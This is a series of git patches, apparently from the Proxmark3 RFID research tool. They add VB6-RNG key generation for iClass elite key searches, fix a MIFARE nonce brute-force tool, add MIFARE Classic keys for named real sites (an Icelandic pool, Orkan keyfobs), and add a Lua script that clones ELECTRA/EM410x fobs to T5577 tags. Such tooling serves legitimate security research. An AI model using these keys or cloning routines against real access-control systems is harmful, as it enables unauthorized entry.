CmdHFiClassLookUp(const char *Cmd) { } } - bool use_elite = arg_get_lit(ctx, 5); - bool use_raw = arg_get_lit(ctx, 6); - CLIParserFree(ctx); uint8_t CCNR[12]; uint8_t MAC_TAG[4] = { 0, 0, 0, 0 }; - // stupid copy.. CCNR is a combo of epurse and reader nonce + // Stupid copy.. CCNR is a combo of epurse and reader nonce memcpy(CCNR, epurse, 8); memcpy(CCNR + 8, macs, 4); memcpy(MAC_TAG, macs + 4, 4); @@ -3853,20 +3905,34 @@ static int CmdHFiClassLookUp(const char *Cmd) { PrintAndLogEx(SUCCESS, " CCNR: " _GREEN_("%s"), sprint_hex(CCNR, sizeof(CCNR))); PrintAndLogEx(SUCCESS, "TAG MAC: %s", sprint_hex(MAC_TAG, sizeof(MAC_TAG))); - // run time + // Run time uint64_t t1 = msclock(); uint8_t *keyBlock = NULL; uint32_t keycount = 0; - // load keys - int res = loadFileDICTIONARY_safe(filename, (void **)&keyBlock, 8, &keycount); - if (res != PM3_SUCCESS || keycount == 0) { - free(keyBlock); - return res; + if (!use_vb6kdf) { + // Load keys + int res = loadFileDICTIONARY_safe(filename, (void **)&keyBlock, 8, &keycount); + if (res != PM3_SUCCESS || keycount == 0) { + free(keyBlock); + return res; + } + } else { + // Generate 5000 keys using VB6 KDF + keycount = 5000; + keyBlock = malloc(keycount * 8); + if (!keyBlock) { + return PM3_EMALLOC; + } + + picopass_elite_reset(); + for (uint32_t i = 0; i < keycount; i++) { + picopass_elite_nextKey(keyBlock + (i * 8)); + } } - //iclass_prekey_t + // Iclass_prekey_t iclass_prekey_t *prekey = calloc(keycount, sizeof(iclass_prekey_t)); if (!prekey) { free(keyBlock); @@ -3883,7 +3949,7 @@ static int CmdHFiClassLookUp(const char *Cmd) { PrintAndLogEx(INFO, "Sorting..."); - // sort mac list. + // Sort mac list qsort(prekey, keycount, sizeof(iclass_prekey_t), cmp_uint32); PrintAndLogEx(SUCCESS, "Searching for " _YELLOW_("%s") " key...", "DEBIT"); @@ -3891,7 +3957,7 @@ static int CmdHFiClassLookUp(const char *Cmd) { iclass_prekey_t lookup; memcpy(lookup.mac, MAC_TAG, 4); - // binsearch + // Binsearch item = (iclass_prekey_t *) bsearch(&lookup, prekey, keycount, sizeof(iclass_prekey_t), cmp_uint32); if (item != NULL) { @@ -3900,7 +3966,7 @@ static int CmdHFiClassLookUp(const char *Cmd) { } t1 = msclock() - t1; - PrintAndLogEx(SUCCESS, "time in iclass lookup " _YELLOW_("%.3f") " seconds", (float)t1 / 1000.0); + PrintAndLogEx(SUCCESS, "Time in iclass lookup " _YELLOW_("%.3f") " seconds", (float)t1 / 1000.0); free(prekey); free(keyBlock); diff --git a/client/src/cmdhficlass.h b/client/src/cmdhficlass.h index db242d496..b3b0844ab 100644 --- a/client/src/cmdhficlass.h +++ b/client/src/cmdhficlass.h @@ -36,4 +36,10 @@ void PrintPreCalc(iclass_prekey_t *list, uint32_t itemcnt); uint8_t get_pagemap(const picopass_hdr_t *hdr); bool check_known_default(uint8_t *csn, uint8_t *epurse, uint8_t *rmac, uint8_t *tmac, uint8_t *key); + +void picopass_elite_nextKey(uint8_t* key); +void picopass_elite_reset(void); +uint32_t picopass_elite_rng(void); +uint32_t picopass_elite_lcg(void); +uint8_t picopass_elite_nextByte(void); #endif From fbacd60e41f320a36a1e461f50f69b89eb1e8bde Mon Sep 17 00:00:00 2001 From: Antiklesys Date: Fri, 12 Jul 2024 14:46:23 +0800 Subject: [PATCH 082/112] Implemented VB6 rng for iclass chk elite key search Implemented VB6 rng for iclass chk elite key search based on @bettse implementation on Flipper Zero Picopass app --- CHANGELOG.md | 2 +- client/src/cmdhficlass.c | 41 +++++++++++++++++++++++++++++++--------- 2 files changed, 33 insertions(+), 10 deletions(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 89143f958..12c8e95c7 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -10,7 +10,7 @@ This project uses the changelog in accordance with [keepchangelog](http://keepac - Added `pm3_tears_for_fears.py` - a ISO14443b tear off script by Pierre Granier - Added new t55xx password (002BCFCF) sniffed from cheap cloner (@davidbeauchamp) - Fixed 'hf 14b sim' - now works (@michi-jung) -- Added VB6 Rng for iclass elite keys lookup by porting @bettse work in the Flipper Zero Picopass App (@antiklesys) +- Added VB6 Rng for iclass elite keys `hf iclass lookup` and `hf iclass chk` functions by porting @bettse work in the Flipper Zero Picopass App (@antiklesys) ## [Aurora.4.18589][2024-05-28] - Fixed the pm3 regressiontests for Hitag2Crack (@iceman1001) diff --git a/client/src/cmdhficlass.c b/client/src/cmdhficlass.c index f3bf3fd51..eaa83aeaf 100644 --- a/client/src/cmdhficlass.c +++ b/client/src/cmdhficlass.c @@ -3581,26 +3581,33 @@ static int CmdHFiClassCheckKeys(const char *Cmd) { CLIParserInit(&ctx, "hf iclass chk", "Checkkeys loads a dictionary text file with 8byte hex keys to test authenticating against a iClass tag", "hf iclass chk -f iclass_default_keys.dic\n" - "hf iclass chk -f iclass_elite_keys.dic --elite"); + "hf iclass chk -f iclass_elite_keys.dic --elite\n" + "hf iclass chk --vb6kdf\n"); void *argtable[] = { arg_param_begin, - arg_str1("f", "file", "", "Dictionary file with default iclass keys"), + arg_str0("f", "file", "", "Dictionary file with default iclass keys"), arg_lit0(NULL, "credit", "key is assumed to be the credit key"), arg_lit0(NULL, "elite", "elite computations applied to key"), arg_lit0(NULL, "raw", "no computations applied to key (raw)"), arg_lit0(NULL, "shallow", "use shallow (ASK) reader modulation instead of OOK"), + arg_lit0(NULL, "vb6kdf", "use the VB6 elite KDF instead of a file"), arg_param_end }; CLIExecWithReturn(ctx, Cmd, argtable, false); int fnlen = 0; char filename[FILE_PATH_SIZE] = {0}; - CLIParamStrToBuf(arg_get_str(ctx, 1), (uint8_t *)filename, FILE_PATH_SIZE, &fnlen); - - bool use_credit_key = arg_get_lit(ctx, 2); + bool use_vb6kdf = arg_get_lit(ctx, 6); bool use_elite = arg_get_lit(ctx, 3); bool use_raw = arg_get_lit(ctx, 4); + if(use_vb6kdf){ + use_elite = true; + }else{ + CLIParamStrToBuf(arg_get_str(ctx, 1), (uint8_t *)filename, FILE_PATH_SIZE, &fnlen); + } + + bool use_credit_key = arg_get_lit(ctx, 2); bool shallow_mod = arg_get_lit(ctx, 5); CLIParserFree(ctx); @@ -3613,10 +3620,26 @@ static int CmdHFiClassCheckKeys(const char *Cmd) { // load keys uint8_t *keyBlock = NULL; uint32_t keycount = 0; - int res = loadFileDICTIONARY_safe(filename, (void **)&keyBlock, 8, &keycount); - if (res != PM3_SUCCESS || keycount == 0) { - free(keyBlock); - return res; + + if (!use_vb6kdf) { + // Load keys + int res = loadFileDICTIONARY_safe(filename, (void **)&keyBlock, 8, &keycount); + if (res != PM3_SUCCESS || keycount == 0) { + free(keyBlock); + return res; + } + } else { + // Generate 5000 keys using VB6 KDF + keycount = 5000; + keyBlock = malloc(keycount * 8); + if (!keyBlock) { + return PM3_EMALLOC; + } + + picopass_elite_reset(); + for (uint32_t i = 0; i < keycount; i++) { + picopass_elite_nextKey(keyBlock + (i * 8)); + } } // limit size of keys that can be held in memory From 3461b6f80320fdb5cd6d6509b3afc7c06cb7bd40 Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Fri, 12 Jul 2024 15:06:08 +0200 Subject: [PATCH 083/112] fixed type confusing error when trying to load none supported .picopass files. Thanks to Jump for the suggested fixes --- CHANGELOG.md | 1 + client/src/fileutils.c | 95 +++++++++++++++++++++++++++--------------- client/src/fileutils.h | 2 +- 3 files changed, 64 insertions(+), 34 deletions(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 12c8e95c7..b9877ff17 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -3,6 +3,7 @@ All notable changes to this project will be documented in this file. This project uses the changelog in accordance with [keepchangelog](http://keepachangelog.com/). Please use this to write notable changes, which is not the same as git commit log... ## [unreleased][unreleased] +- fixed breaking of client when trying to load a non-supported .picopass file (@iceman100) Thanks to Jump for suggested fixes! - Changed `mf_nonce_brute` tool to handle the odd case of multiple key candidates (@iceman1001) - Fixed a bad memory erase (@iceman1001) - Fixed BT serial comms (@iceman1001) diff --git a/client/src/fileutils.c b/client/src/fileutils.c index 5fa74c4b0..1833f74b9 100644 --- a/client/src/fileutils.c +++ b/client/src/fileutils.c @@ -2162,14 +2162,18 @@ int loadFileDICTIONARY(const char *preferredName, void *data, size_t *datalen, u int loadFileDICTIONARYEx(const char *preferredName, void *data, size_t maxdatalen, size_t *datalen, uint8_t keylen, uint32_t *keycnt, size_t startFilePosition, size_t *endFilePosition, bool verbose) { - if (data == NULL) return PM3_EINVARG; + if (data == NULL) { + return PM3_EINVARG; + } - if (endFilePosition) + if (endFilePosition) { *endFilePosition = 0; + } char *path; - if (searchFile(&path, DICTIONARIES_SUBDIR, preferredName, ".dic", false) != PM3_SUCCESS) + if (searchFile(&path, DICTIONARIES_SUBDIR, preferredName, ".dic", false) != PM3_SUCCESS) { return PM3_EFILE; + } // double up since its chars keylen <<= 1; @@ -2201,8 +2205,9 @@ int loadFileDICTIONARYEx(const char *preferredName, void *data, size_t maxdatale long filepos = ftell(f); if (!fgets(line, sizeof(line), f)) { - if (endFilePosition) + if (endFilePosition) { *endFilePosition = 0; + } break; } @@ -2210,39 +2215,50 @@ int loadFileDICTIONARYEx(const char *preferredName, void *data, size_t maxdatale line[keylen] = 0; // smaller keys than expected is skipped - if (strlen(line) < keylen) + if (strlen(line) < keylen) { continue; + } // The line start with # is comment, skip - if (line[0] == '#') + if (line[0] == '#') { continue; + } - if (!CheckStringIsHEXValue(line)) + if (!CheckStringIsHEXValue(line)) { continue; + } // cant store more data if (maxdatalen && (counter + (keylen >> 1) > maxdatalen)) { retval = 1; - if (endFilePosition) + if (endFilePosition) { *endFilePosition = filepos; + } break; } - if (hex_to_bytes(line, udata + counter, keylen >> 1) != (keylen >> 1)) + if (hex_to_bytes(line, udata + counter, keylen >> 1) != (keylen >> 1)) { continue; + } vkeycnt++; memset(line, 0, sizeof(line)); counter += (keylen >> 1); } - fclose(f); - if (verbose) - PrintAndLogEx(SUCCESS, "Loaded " _GREEN_("%2d") " keys from dictionary file `" _YELLOW_("%s") "`", vkeycnt, path); - if (datalen) + fclose(f); + + if (verbose) { + PrintAndLogEx(SUCCESS, "Loaded " _GREEN_("%2d") " keys from dictionary file `" _YELLOW_("%s") "`", vkeycnt, path); + } + + if (datalen) { *datalen = counter; - if (keycnt) + } + + if (keycnt) { *keycnt = vkeycnt; + } out: free(path); return retval; @@ -2253,8 +2269,9 @@ int loadFileDICTIONARY_safe(const char *preferredName, void **pdata, uint8_t key int retval = PM3_SUCCESS; char *path; - if (searchFile(&path, DICTIONARIES_SUBDIR, preferredName, ".dic", false) != PM3_SUCCESS) + if (searchFile(&path, DICTIONARIES_SUBDIR, preferredName, ".dic", false) != PM3_SUCCESS) { return PM3_EFILE; + } // t5577 == 4bytes // mifare == 6 bytes @@ -2311,15 +2328,18 @@ int loadFileDICTIONARY_safe(const char *preferredName, void **pdata, uint8_t key line[keylen] = 0; // smaller keys than expected is skipped - if (strlen(line) < keylen) + if (strlen(line) < keylen) { continue; + } // The line start with # is comment, skip - if (line[0] == '#') + if (line[0] == '#') { continue; + } - if (!CheckStringIsHEXValue(line)) + if (!CheckStringIsHEXValue(line)) { continue; + } uint64_t key = strtoull(line, NULL, 16); @@ -2330,6 +2350,7 @@ int loadFileDICTIONARY_safe(const char *preferredName, void **pdata, uint8_t key memset(line, 0, sizeof(line)); } fclose(f); + PrintAndLogEx(SUCCESS, "Loaded " _GREEN_("%2d") " keys from dictionary file `" _YELLOW_("%s") "`", *keycnt, path); out: @@ -2453,7 +2474,9 @@ mfu_df_e detect_mfu_dump_format(uint8_t **dump, bool verbose) { return retval; } -nfc_df_e detect_nfc_dump_format(const char *preferredName, bool verbose) { +int detect_nfc_dump_format(const char *preferredName, nfc_df_e *dump_type, bool verbose) { + + *dump_type = NFC_DF_UNKNOWN; char *path; int res = searchFile(&path, RESOURCES_SUBDIR, preferredName, "", false); @@ -2469,8 +2492,6 @@ nfc_df_e detect_nfc_dump_format(const char *preferredName, bool verbose) { } free(path); - nfc_df_e retval = NFC_DF_UNKNOWN; - char line[256]; memset(line, 0, sizeof(line)); @@ -2492,31 +2513,31 @@ nfc_df_e detect_nfc_dump_format(const char *preferredName, bool verbose) { str_lower(line); if (str_startswith(line, "device type: ntag")) { - retval = NFC_DF_MFU; + *dump_type = NFC_DF_MFU; break; } if (str_startswith(line, "device type: mifare classic")) { - retval = NFC_DF_MFC; + *dump_type = NFC_DF_MFC; break; } if (str_startswith(line, "device type: mifare desfire")) { - retval = NFC_DF_MFDES; + *dump_type = NFC_DF_MFDES; break; } if (str_startswith(line, "device type: iso14443-3a")) { - retval = NFC_DF_14_3A; + *dump_type = NFC_DF_14_3A; break; } if (str_startswith(line, "device type: iso14443-3b")) { - retval = NFC_DF_14_3B; + *dump_type = NFC_DF_14_3B; break; } if (str_startswith(line, "device type: iso14443-4a")) { - retval = NFC_DF_14_4A; + *dump_type = NFC_DF_14_4A; break; } if (str_startswith(line, "filetype: flipper picopass device")) { - retval = NFC_DF_PICOPASS; + *dump_type = NFC_DF_PICOPASS; break; } @@ -2524,7 +2545,7 @@ nfc_df_e detect_nfc_dump_format(const char *preferredName, bool verbose) { fclose(f); if (verbose) { - switch (retval) { + switch (*dump_type) { case NFC_DF_MFU: PrintAndLogEx(INFO, "Detected MIFARE Ultralight / NTAG based dump format"); break; @@ -2551,7 +2572,7 @@ nfc_df_e detect_nfc_dump_format(const char *preferredName, bool verbose) { break; } } - return retval; + return PM3_SUCCESS; } static int convert_plain_mfu_dump(uint8_t **dump, size_t *dumplen, bool verbose) { @@ -2996,15 +3017,20 @@ int pm3_load_dump(const char *fn, void **pdump, size_t *dumplen, size_t maxdumpl break; } case FLIPPER: { - nfc_df_e foo = detect_nfc_dump_format(fn, true); - if (foo == NFC_DF_MFC || foo == NFC_DF_MFU || foo == NFC_DF_PICOPASS) { + nfc_df_e dumptype; + res = detect_nfc_dump_format(fn, &dumptype, true); + if (res != SUCCESS) { + break; + } + + if (dumptype == NFC_DF_MFC || dumptype == NFC_DF_MFU || dumptype == NFC_DF_PICOPASS) { *pdump = calloc(maxdumplen, sizeof(uint8_t)); if (*pdump == NULL) { PrintAndLogEx(WARNING, "Fail, cannot allocate memory"); return PM3_EMALLOC; } - res = loadFileNFC_safe(fn, *pdump, maxdumplen, dumplen, foo); + res = loadFileNFC_safe(fn, *pdump, maxdumplen, dumplen, dumptype); if (res == PM3_SUCCESS) { return res; } @@ -3016,6 +3042,9 @@ int pm3_load_dump(const char *fn, void **pdump, size_t *dumplen, size_t maxdumpl } else if (res == PM3_EMALLOC) { PrintAndLogEx(WARNING, "wrong size of allocated memory. Check your parameters"); } + } else { + // unknown dump file type + res = PM3_ESOFT; } break; } diff --git a/client/src/fileutils.h b/client/src/fileutils.h index b469eba68..c69185425 100644 --- a/client/src/fileutils.h +++ b/client/src/fileutils.h @@ -289,7 +289,7 @@ int loadFileBinaryKey(const char *preferredName, const char *suffix, void **keya */ int convert_mfu_dump_format(uint8_t **dump, size_t *dumplen, bool verbose); mfu_df_e detect_mfu_dump_format(uint8_t **dump, bool verbose); -nfc_df_e detect_nfc_dump_format(const char *preferredName, bool verbose); +int detect_nfc_dump_format(const char *preferredName, nfc_df_e *dump_type, bool verbose); int searchAndList(const char *pm3dir, const char *ext); int searchFile(char **foundpath, const char *pm3dir, const char *searchname, const char *suffix, bool silent); From 8ee0df159d54d068e0c2deaa3cc43293142d65ee Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Fri, 12 Jul 2024 15:41:45 +0200 Subject: [PATCH 084/112] fix output --- tools/mf_nonce_brute/mf_nonce_brute.c | 15 +++++++++------ 1 file changed, 9 insertions(+), 6 deletions(-) diff --git a/tools/mf_nonce_brute/mf_nonce_brute.c b/tools/mf_nonce_brute/mf_nonce_brute.c index 2e10ccbf1..36652a685 100644 --- a/tools/mf_nonce_brute/mf_nonce_brute.c +++ b/tools/mf_nonce_brute/mf_nonce_brute.c @@ -595,13 +595,12 @@ static void *brute_thread(void *arguments) { static void *brute_key_thread(void *arguments) { struct thread_key_args *args = (struct thread_key_args *) arguments; - uint64_t key; uint8_t local_enc[args->enc_len]; memcpy(local_enc, args->enc, args->enc_len); for (uint64_t count = args->idx; count <= 0xFFFF; count += thread_count) { - key = args->part_key | (count << 32); + uint64_t key = args->part_key | (count << 32); // Init cipher with key struct Crypto1State *pcs = crypto1_create(key); @@ -794,7 +793,7 @@ int main(int argc, const char *argv[]) { } if (enc_len < 4) { - printf("Too few next cmd bytes, skipping phase 2\n"); + printf("Too few next cmd bytes, skipping phase 3\n\n"); goto out; } @@ -830,11 +829,15 @@ int main(int argc, const char *argv[]) { pthread_join(threads[i], NULL); } + if (global_found_candidate > 1) { - printf("\nOdd case but we found " _GREEN_("%d") " possible keys", global_found_candidate); - printf("\n" _YELLOW_("You need to test all of them manually, start with the one matching the candidate\n\n")); + printf("Key recovery ( " _GREEN_("ok") " )\n"); + printf("Found " _GREEN_("%d") " possible keys\n", global_found_candidate); + printf(_YELLOW_("You need to test them manually, start with the one matching the candidate\n\n")); + } else if (global_found_candidate == 1) { + printf("Key recovery ( " _GREEN_("ok") " )\n\n"); } else { - printf("\nfailed to find a key\n\n"); + printf("Key recovery ( " _RED_("fail") " )\n\n"); } out: From 0495cc1086bdd2975d7cb51ec3df68b9308c9d3c Mon Sep 17 00:00:00 2001 From: dandri Date: Sat, 13 Jul 2024 19:53:28 +0000 Subject: [PATCH 085/112] Update mfc_default_keys.dic Add keys for Laugardalslaug in Iceland --- client/dictionaries/mfc_default_keys.dic | 3 +++ 1 file changed, 3 insertions(+) diff --git a/client/dictionaries/mfc_default_keys.dic b/client/dictionaries/mfc_default_keys.dic index ba88c83d6..7b80b6728 100644 --- a/client/dictionaries/mfc_default_keys.dic +++ b/client/dictionaries/mfc_default_keys.dic @@ -2521,3 +2521,6 @@ bd6af9754c18 17fe45604a0d 17fe45604a0e 17fe45604a0f +# keys for Laugardalslaug in Iceland +3E65E4FB65B3 +28220F14BEF0 From c5c6ec0c87189ecb00113736b6df4c20d4face50 Mon Sep 17 00:00:00 2001 From: dandri Date: Sat, 13 Jul 2024 20:02:53 +0000 Subject: [PATCH 086/112] Update CHANGELOG.md Added text for mfc keys for Laugardalslaug in Iceland --- CHANGELOG.md | 1 + 1 file changed, 1 insertion(+) diff --git a/CHANGELOG.md b/CHANGELOG.md index b9877ff17..772fb54fb 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -12,6 +12,7 @@ This project uses the changelog in accordance with [keepchangelog](http://keepac - Added new t55xx password (002BCFCF) sniffed from cheap cloner (@davidbeauchamp) - Fixed 'hf 14b sim' - now works (@michi-jung) - Added VB6 Rng for iclass elite keys `hf iclass lookup` and `hf iclass chk` functions by porting @bettse work in the Flipper Zero Picopass App (@antiklesys) +- Added MFC Keys for Laugardalslaug in Iceland (@dandri) ## [Aurora.4.18589][2024-05-28] - Fixed the pm3 regressiontests for Hitag2Crack (@iceman1001) From 8fc63c4156be1d9585908926c692dca3bb41a769 Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Sat, 13 Jul 2024 22:29:26 +0200 Subject: [PATCH 087/112] clean --- client/dictionaries/mfc_default_keys.dic | 1 - 1 file changed, 1 deletion(-) diff --git a/client/dictionaries/mfc_default_keys.dic b/client/dictionaries/mfc_default_keys.dic index 7b80b6728..a1ee010b7 100644 --- a/client/dictionaries/mfc_default_keys.dic +++ b/client/dictionaries/mfc_default_keys.dic @@ -2522,5 +2522,4 @@ bd6af9754c18 17fe45604a0e 17fe45604a0f # keys for Laugardalslaug in Iceland -3E65E4FB65B3 28220F14BEF0 From edb2bcb288c38a2849183b178987336bf7fcacf4 Mon Sep 17 00:00:00 2001 From: dandri Date: Sun, 14 Jul 2024 19:58:45 +0000 Subject: [PATCH 088/112] Update mfc_default_keys.dic Add key for Orkan keyfobs/cards --- client/dictionaries/mfc_default_keys.dic | 2 ++ 1 file changed, 2 insertions(+) diff --git a/client/dictionaries/mfc_default_keys.dic b/client/dictionaries/mfc_default_keys.dic index a1ee010b7..44822432e 100644 --- a/client/dictionaries/mfc_default_keys.dic +++ b/client/dictionaries/mfc_default_keys.dic @@ -2523,3 +2523,5 @@ bd6af9754c18 17fe45604a0f # keys for Laugardalslaug in Iceland 28220F14BEF0 +# key for Orkan keyfobs +300724070486 From b046fbf3a374d576a362dcfeeae53db08c49be86 Mon Sep 17 00:00:00 2001 From: dandri Date: Sun, 14 Jul 2024 20:32:55 +0000 Subject: [PATCH 089/112] Update CHANGELOG.md --- CHANGELOG.md | 1 + 1 file changed, 1 insertion(+) diff --git a/CHANGELOG.md b/CHANGELOG.md index 772fb54fb..19f23eea2 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -13,6 +13,7 @@ This project uses the changelog in accordance with [keepchangelog](http://keepac - Fixed 'hf 14b sim' - now works (@michi-jung) - Added VB6 Rng for iclass elite keys `hf iclass lookup` and `hf iclass chk` functions by porting @bettse work in the Flipper Zero Picopass App (@antiklesys) - Added MFC Keys for Laugardalslaug in Iceland (@dandri) +- Added key for Orkan keyfobs(@dandri) ## [Aurora.4.18589][2024-05-28] - Fixed the pm3 regressiontests for Hitag2Crack (@iceman1001) From 29937d39c67e87451f123a232b464b4d059ef11a Mon Sep 17 00:00:00 2001 From: Vasil Petrov Date: Mon, 15 Jul 2024 12:42:08 +0300 Subject: [PATCH 090/112] Lua script for cloning new ELECTRA tags or EM410x to T5577 tag --- client/luascripts/lf_electra.lua | 326 +++++++++++++++++++++++++++++++ 1 file changed, 326 insertions(+) create mode 100644 client/luascripts/lf_electra.lua diff --git a/client/luascripts/lf_electra.lua b/client/luascripts/lf_electra.lua new file mode 100644 index 000000000..38b6e6e64 --- /dev/null +++ b/client/luascripts/lf_electra.lua @@ -0,0 +1,326 @@ +local getopt = require('getopt') +local utils = require('utils') +local ac = require('ansicolors') +local os = require('os') +local count = 0 +line = '-------------------------------------------------------------------------' +mod = " ELECTRA or EM410x fob cloning SCRIPT " +version = " v1.1.17 02/09/2023 made by jareckib " +desc = [[ + + Cloning new ELECTRA tags or EM410x to T5577 tag. This script changes + block 0. Additional data is written to block 3 and 4. The last + ELECTRA ID can be accessed through the option ---> "-c". For copy + directly from the original ELECTRA tag, ---> option "-e". For copy + from input, EM410X ID ---> option "-s". Next option for cloning simple + EM4102 ---> option "-m". If press it, which writes an ID. + If press ---> exit the script. +]] +example = [[ +------------------------------------------------------------------------------- + +--------------- cloning ELECTRA tag from input ID to T5577 tag ---------------- + + script run lf_electra -s 11AA22BB55 + +----------------- continue cloning from last cloned ELECTRA ------------------- + + script run lf_electra -c + +---------------------- ELECTRA cloning from the original TAG ----------------- + + script run lf_electra -e + +----------------------------- simple EM4102 cloning --------------------------- + + script run lf_electra -m + +------------------------------------------------------------------------------- +]] +usage = [[ + script run lf_electra.lua [-e] [-h] [-c] [-m] [-s ] +]] +arguments = [[ + -h : this help + -c : continue cloning from last ID used + -s : ELECTRA - EM410x ID HEX number + -e : Read original ELECTRA from Proxmark3 device + -m : EM410x cloning + ]] +--------------------------------------Path to logs files +local DEBUG = false +local dir = os.getenv('HOME')..'/.proxmark3/logs/' +local LAST_ID = os.getenv('HOME')..'/.proxmark3/logs/last_id.txt' +local ID_STATUS = (io.popen('dir /a-d /o-d /tw /b/s "'..dir..'" 2>nul:'):read("*a"):match"%C+") +if not ID_STATUS then + error"No files in this directory" +end +-------------------------------------------A debug printout-function +local function dbg(args) + if not DEBUG then return end + if type(args) == 'table' then + local i = 1 + while args[i] do + dbg(args[i]) + i = i+1 + end + else + print('###', args) + end +end +------------------------------------------------- errors +local function oops(err) + core.console('clear') + print( string.rep('--',39) ) + print( string.rep('--',39) ) + print(ac.red..' ERROR:'..ac.reset.. err) + print( string.rep('--',39) ) + print( string.rep('--',39) ) + return nil, err +end +-----------------------------------------------sleep +local function sleep(n) + os.execute("sleep " ..tonumber(n)) +end +--------------------wait +function wait(msec) + local t = os.clock() + repeat + until os.clock() > t + msec * 1e-3 +end +----------------------------------------------time wait +local function timer(n) + while n > 0 do + io.write(ac.cyan.." ::::: "..ac.yellow.. tonumber(n) ..ac.yellow.." sec "..ac.cyan..":::::\r"..ac.reset) + sleep(1) + io.flush() + n = n-1 + end +end +----------------------------------------------------- help +local function help() + core.console('clear') + print(line) + print(ac.cyan..mod..ac.reset) + print(ac.cyan..version..ac.reset) + print(ac.yellow..desc..ac.reset) + print(line) + print(ac.cyan..' Usage'..ac.reset) + print(usage) + print(ac.cyan..' Arguments'..ac.reset) + print(arguments) + print(line) + timer(30) + core.console('clear') + print(ac.cyan..' Example usage'..ac.reset) + print(example) +end +------------------------------------ Exit message +local function exitMsg(msg) + print( string.rep('--',39) ) + print( string.rep('--',39) ) + print(msg) + print() +end +--------------------------------- idsearch EM ID +local function id() + local f = assert(io.open(ID_STATUS, "r")) + for line in f:lines() do + id = line:match"^%[%+%] EM 410x ID (%x+)" + if id then break end + end + f:close() + local f= io.open(ID_STATUS, "w+") + f:write(id) + f:close() + local f= io.open(ID_STATUS, "r") + local t = f:read("*all") + f:close() + local hex_hi = tonumber(t:sub(1, 2), 16) + local hex_low = tonumber(t:sub(3, 10), 16) + return hex_hi, hex_low +end +---------------------------------------read file +local function readfile() + local f = io.open(ID_STATUS, "r") + for line in f:lines() do + id = line:match"^(%x+)" + if id then break end + end + f:close() + if not id then + return oops (" ....No ID found in file") end + local f= io.open(ID_STATUS, "r") + local t = f:read("*all") + f:close() + local hex_hi = tonumber(t:sub(1, 2), 16) + local hex_low = tonumber(t:sub(3, 10), 16) + return hex_hi, hex_low +end +----------------------------------------last ID +local function IDsaved() + local f = io.open(LAST_ID, "r") + for line in f:lines() do + id = line:match"^(%x+)" + if id then break end + end + f:close() + if not id then + return oops (" ....No ID found in file") end + local f= io.open(LAST_ID, "r") + local t = f:read("*all") + f:close() + local hex_hi = tonumber(t:sub(1, 2), 16) + local hex_low = tonumber(t:sub(3, 10), 16) + return hex_hi, hex_low +end +----------------------------------------write file +local function writefile(hex_hi, hex_low) + local f = io.open(ID_STATUS, "w+") + local g = io.open(LAST_ID, 'w+') + f:write(("%02X%08X\n"):format(hex_hi, hex_low)) + f:close() + g:write(("%02X%08X\n"):format(hex_hi, hex_low)) + g:close() + print((' Saved EM410x ID '..ac.green..'%02X%08X'..ac.reset..' to TXT file:'):format(hex_hi, hex_low)) + print((ac.yellow..' %s'..ac.reset):format(LAST_ID)) + return true, 'Ok' +end +---------------replace line +local last_str = '' +function txt_change(str) + io.write(('\b \b'):rep(#last_str)) -- old line + io.write(str) -- new line + io.flush() + last_str = str +end +---------------------------------------- main +local function main(args) + print( string.rep('--',39) ) + print( string.rep('--',39) ) + print() + if #args == 0 then return help() end + local saved_id = false + local id_original = false + local emarine = false + local input_id = '' + for o, a in getopt.getopt(args, 'hems:c') do + if o == 'h' then return help() end + if o == 'e' then id_original = true end + if o == 'm' then emarine = true end + if o == 's' then input_id = a end + if o == 'c' then saved_id = true end + end + --------------------check -id + if not saved_id and not id_original and not emarine then + if input_id == nil then return oops(' empty EM410x ID string') end + if #input_id == 0 then return oops(' empty EM410x ID string') end + if #input_id < 10 then return oops(' EM410x ID too short. Must be 5 hex bytes') end + if #input_id > 10 then return oops(' EM410x ID too long. Must be 5 hex bytes') end + end + core.console('clear') + print( string.rep('--',39) ) + print(ac.green..' ....... OFF THE HINTS WILL BE LESS ON THE SCREEN'..ac.reset) + print( string.rep('--',39) ) + core.console('pref set hint --off') + print( string.rep('--',39) ) + timer(4) + core.console('clear') + local hi = tonumber(input_id:sub(1, 2), 16) + local low = tonumber(input_id:sub(3, 10), 16) + if saved_id then + hi, low = IDsaved() + print( string.rep('--',39) ) + print( string.rep('--',39) ) + print('') + print(ac.green..' ......Continue cloning from last saved ID'..ac.reset) + print('') + print( string.rep('--',39) ) + end + if id_original then + print( string.rep('--',39) ) + print( string.rep('--',39) ) + print('') + print(ac.green..' Put the ELECTRA tag on the coil PM3 to read '..ac.reset) + print('') + print( string.rep('--',39)) + print(string.rep('--',39)) + end + if emarine then + print( string.rep('--',39) ) + print( string.rep('--',39) ) + print('') + print(ac.green..' Put the EM4102 tag on the coil PM3 to read '..ac.reset) + print('') + print( string.rep('--',39) ) + print( string.rep('--',39) ) + end + if emarine or id_original then + io.write(' Press'..ac.yellow..' Enter'..ac.reset..' to continue ... ');io.read() + txt_change(' Readed TAG : ') + core.console(' lf em 410x read') + print( string.rep('--',39) ) + hi, low = id() + timer(7) + core.console('clear') + print( string.rep('--',39) ) + print( string.rep('--',39) ) + print('') + print(ac.green..' Continuation of the cloning process....'..ac.reset) + print('') + print( string.rep('--',39) ) + end + if not emarine and not id_original and not saved_id then + print( string.rep('--',39) ) + print( string.rep('--',39) ) + print('') + print(ac.green..' ........ ELECTRA cloning from Entered EM-ELECTRA ID'..ac.reset) + print('') + print( string.rep('--',39) ) + end + if emarine then + d = ('EM4102 ID ') + else + d =('ELECTRA ID ') + end + local template = ((d)..ac.green..'%02X%08X'..ac.reset) + for i = low, low + 100, 1 do + local msg = (template):format(hi, low) + print( string.rep('--',39) ) + if count > 0 then + print((' TAGs created: '..ac.green..'%s'..ac.reset):format(count)) + print( string.rep('--',39) ) + end + print((' %s >>>>>> cloning to '..ac.cyan..'T5577 -'..ac.yellow..' Enter'..ac.reset..' for yes or '..ac.yellow..'n'..ac.reset..' for exit'):format(msg)) + print(' Before confirming the cloning operation, put a blank '..ac.cyan..'T5577'..ac.reset..' tag on coil'..ac.cyan..' 